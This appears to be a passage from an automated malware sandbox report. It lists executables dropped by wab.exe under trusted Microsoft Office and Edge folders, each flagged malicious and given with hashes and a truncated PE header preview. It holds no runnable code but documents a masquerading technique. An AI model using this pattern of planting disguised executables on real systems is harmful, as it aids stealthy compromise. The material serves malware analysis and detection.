                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):763032
                                                                              Entropy (8bit):4.0026170623684765
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:TwRnj7XXXXXXSzuz8OZ
                                                                              MD5:5B45157A040A388147F2A881D0DD0AD5
                                                                              SHA1:413FD5E5DB3174D558F3EBE70688A5C41E5DE109
                                                                              SHA-256:BF906BC259DBEB8D7B45F8CC41A7A7C26576B018AFCD7EE7DC7F2743F8375CE2
                                                                              SHA-512:5B0E915CDCF2F844AE8C5E10D9282382DD3198C8EB67556774DAA85225128307D958D0A457E89EEE66FB87DCBB1FEAE4DF85EC52364930FA58E45DACBC5D9D27
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):895120
                                                                              Entropy (8bit):2.860376586914997
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkofCEq7tOxIfMFzCEpAm/4rx7z1arf+9:az8w
                                                                              MD5:DE69185016C6898EB989FF0FFE42D0F3
                                                                              SHA1:AF2EBD25315FFC7C3C2981DE9371D0827B8AF7D5
                                                                              SHA-256:FF89208A70C006CF7CDC585CA29387C24CEEBE2FC239D0D16EBBBBE2DE672899
                                                                              SHA-512:E2B300286DBE9F7A5635BFEE07C03D2E5FC21A9B658CB5E69ABB0A071A15F7B9781C37B9E64C935F8AD54D205AA221D7D679C9D7D1C062426795C279FC5245A9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):105440
                                                                              Entropy (8bit):5.4479881956053084
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWQrkw1jL9zxwKeL9zgt5tjTh7D9:sEl9bbS3VoVjhzxwKehzgt5t1D
                                                                              MD5:D1346C4098D16AC440D5665B99AD4299
                                                                              SHA1:08EF1AC534221589574D4EA2FCD222CB099680DC
                                                                              SHA-256:B8F1B885A5DEDF6893C175CFBA736CDAD9065EF21DD0CDB9BF692E190939657E
                                                                              SHA-512:4F44966E22DEAAD0597A2EF3A0BDB73228D5AD4BE2DF28B9163A3148AC7F11BD322B71198B1FC9281229C03BA0566ADB9D43DE4E390C460EAF3922B8BFDE34A9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):537536
                                                                              Entropy (8bit):4.820102239387087
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkHPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQM6k7uD:TwVR6V7byjUWAZyVVdz8eEdGo
                                                                              MD5:1C214A282C02A2210D46E12AD1644AF9
                                                                              SHA1:4BA7AB5B9869DA21718783ACF5890F5536C75673
                                                                              SHA-256:FF47F769CFFF7BC22EFDC90931AA634879F761EE5D8CDF421062405D0460CE88
                                                                              SHA-512:9260337144393E67C25B28042C25C473117E2E8ED58D16B152D942CA8445DE7D7ECEB4AA7C13CCAFE7C062EC9C872BB3022260061233C30D90DE6F324D417EFE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1271952
                                                                              Entropy (8bit):4.010875755285499
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkj3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppaplpG:TKQSNdhnSzv
                                                                              MD5:9DE7FBDFAAFCC0160D5681DF12BB69D6
                                                                              SHA1:4FA77F76857F535B821279F049B790A51E9A8BDB
                                                                              SHA-256:1AA9AFEA2C76C14A0E0079F3985BF54A7FCFB63E4978FE2520BC291A235F6CE1
                                                                              SHA-512:A8E168D8564892C8D9CDD30C2B7FF38DA77F5B4088861D6169E9810C423FE90C41FDBB2E124849B266944401E4ECF28A35361B2E89D738567028E2F2F835F3A3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4099760
                                                                              Entropy (8bit):3.693585524111332
                                                                              Encrypted:false
                                                                              SSDEEP:12288:IBKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:IBKszX0FjOeblHiled/k
                                                                              MD5:4FEED17F8FC70D5BB28C4862D6A889F0
                                                                              SHA1:1F22653E28C40C5E1DCA3359E8D09201F826CADA
                                                                              SHA-256:2D07C962AFC6E270F04FC82EA4E80D207722AD4064E3B4C3DD58C01FD28C9FD9
                                                                              SHA-512:7BAA4F2A7B38742A00D879079DC0505A16D49261163FC0BDB21BD2709EC91310F15FA1BA0AD0AF053BDC2F341EB0A7B8AD536A6B2DBA88BA1AEF4D2643871269
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1273488
                                                                              Entropy (8bit):4.248522979382886
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoFqYvbZthqyEATS583ONoTqzaezuC8zFtxzzqO9uF:/rkt6bZt+ATS583ONo4aezJ8ZfqiA
                                                                              MD5:EAEADD9008A5081007BD4EC21056B686
                                                                              SHA1:6E6FAF94275ECD60262A054AFAB6FB2EB9407FB9
                                                                              SHA-256:5F97D3C8153157B4735B36EA3E6017A8977BF6F094285ADC5F4229490E3DFF64
                                                                              SHA-512:0E991651B2F43B0DE5D43CE1E13CD20B8127FBE7C730F649097B8F380E19198C48E9AA73B597B8BE6A9A02650E0EE84FC37D5876B6A5C0A85551E03BB76AFD90
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):124056
                                                                              Entropy (8bit):5.162520482821961
                                                                              Encrypted:false
                                                                              SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                              MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                              SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                              SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                              SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2970664
                                                                              Entropy (8bit):3.820583432588951
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2d0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5NGpHsh:v/V/CfDhNG5sMXjjzmEPoL
                                                                              MD5:E9C85E1FA1B8589A48F3EB64AC2AEF55
                                                                              SHA1:79FC306650CA197E7EAD24B543C648A05F2135A7
                                                                              SHA-256:68177C8014C778BD17E522F2BE6FE4EC0D8C81BA3B99B2A7EF9787CFA13D8778
                                                                              SHA-512:DD6074E277BDB8C32F60C4D5B597A2765B302C528C83FA7C9241172376734CC4B192F4B51FBD49DF3DCCA402D250C1F5A9A4F629F1EE945F0A480ACF60D26774
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3531712
                                                                              Entropy (8bit):3.7529139446179247
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkmKGOKsuWoZ65B/SRDF7eYECYK6QojSgQojS+E1c9zvWiYwOsqE1c93se1jLvI:psSR7PYKzz38YwZItvsDu7DbDhRAUzHW
                                                                              MD5:99E2EFC53DBFF45C58BD02DE092DA361
                                                                              SHA1:23D1B97242F3ABE6A2FA2760979E685CE6C0E2A4
                                                                              SHA-256:75AA16261BB138BB189DCED02C4F2513B1708A34EF6D32DCA7488F274C12C848
                                                                              SHA-512:1BFF3410DB57ACAFA690187E5F8FB371BFDB7CF98A5CBA8CE994A3F5C3772343B29638B977C498DB665F6AA2A6339846D2CB999E9A34F68730E327831B0F219D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4319272
                                                                              Entropy (8bit):3.79026092720144
                                                                              Encrypted:false
                                                                              SSDEEP:6144:lmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:l+6M+595B
                                                                              MD5:27172A2CB05C40580B9017E397CFEB83
                                                                              SHA1:F6BEE6DB343B8872D2A7C76257634DD19D7C7D79
                                                                              SHA-256:4723D994C08DD93D23FEAA220B856AF02E1321E03195AFD52556DAF0405BFE32
                                                                              SHA-512:DE7C44A923213B546719B4FAC292E1A4FE3F986578B8AC694BA5AF0F6BB463308434C3AE37D098F126558EE09FBCA39F6D85B4FB87694C63A789E4A50359861C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1082008
                                                                              Entropy (8bit):3.688463156686676
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
                                                                              MD5:3A47AB68F40340B1078860C968FE8489
                                                                              SHA1:D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
                                                                              SHA-256:45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
                                                                              SHA-512:0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):582184
                                                                              Entropy (8bit):6.307656763450446
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RLWET8DS698nGX2OduCwUJWh/JmmS3DAjqnkrzFoEh+vMKC239YUFgBdQ/:RLxT8DhyiLduCe/lSpn6zOvYUFg4/
                                                                              MD5:8E107EC5C05E14ADBD1E438D34E95933
                                                                              SHA1:24886C632652861525F572C7BF712C5EA77FA528
                                                                              SHA-256:C22DC2815FC5A8EA00A8E6C24369DFFC739E40D70C855E8D0CC4FC880852C1C9
                                                                              SHA-512:E39FFD9CDB5606E18F8FE9ABBB7D8B4EE541E6930B60E9726531706252FC403E9A44EF16143DC23B4C3ABCCBF6026FE5C0F5B6A2470F8DBB042F5FCF1B165C1E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3837992
                                                                              Entropy (8bit):6.430735070062025
                                                                              Encrypted:false
                                                                              SSDEEP:49152:nB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EK:7HzorVmr2FkRpdJYolA
                                                                              MD5:2F12C8B3D0AD5544C44A027661513F42
                                                                              SHA1:ECEE87DEE3CBC301B9667EE8D4E71B44ACD6E1C0
                                                                              SHA-256:80A2436A6A0D526D1A194CF0FD93704BB00DD853CC75882F007FD1FD1634E92D
                                                                              SHA-512:686A0711379700973F8C63F3AE163D5302AE770DAF8AD64D1FB405C254524D8534892C65EB6686D89D4A4BC27C2CE142F1FB14E46B55F1EE8E190405E2949742
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):161832
                                                                              Entropy (8bit):5.761346604218296
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkl2VSd2ga8KActASiZAkXS1xU5M3XgcoT0cs4qIm6Y6:5VSktVjv3Xg5T0FIY6
                                                                              MD5:547C9C694BBBB41A9D14ACB071FD2655
                                                                              SHA1:CFAB946D63B2FD3AD9B25A7C24F43FBDCDFCB66D
                                                                              SHA-256:B4EAE61AE843F58EB2F4A30FFEC9E818806A15D0B897F4939232930600AC6F32
                                                                              SHA-512:EE25C544B05408FDD1C42396FEEDC734E2A966FD173BEBCC56995D86914F183F2487791C1204157032648AB26F4BF7A161212D173371395BC974DE30CE02F556
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1827880
                                                                              Entropy (8bit):6.514076024677014
                                                                              Encrypted:false
                                                                              SSDEEP:24576:phDdVrQwm5ztlU0A7fMAHmpmZ3QXE/0/lVaLpmasGvP0:phDdVrQ95RW0Y9HyWQXE/09Val0GE
                                                                              MD5:F89BA0EA3E9D573B68F776CDF7F7CDD7
                                                                              SHA1:CAE2E1EA681B990AC9E14D5DD7224A69DCDC134D
                                                                              SHA-256:C2338FC4DD77DF806830471324BEFB0C8BF90042EC166A04B733F3B1174291DB
                                                                              SHA-512:8E2D6C493B6C955B867F52795232CAA33CE95A5D615F834AFDBC09B12750E23C03A771C0C4190AF00958B5E449030B2A221DCE4955A3AA241729DB60237AADA4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1297448
                                                                              Entropy (8bit):6.477378890661513
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BdoA0Eh2XptoQZRuefMYR6RrAJU9CsxmMocSipEylqFfouDMA+nkSddSDBDIq:B70E0ZCQZMip6Rrt9RoctGfmdd0
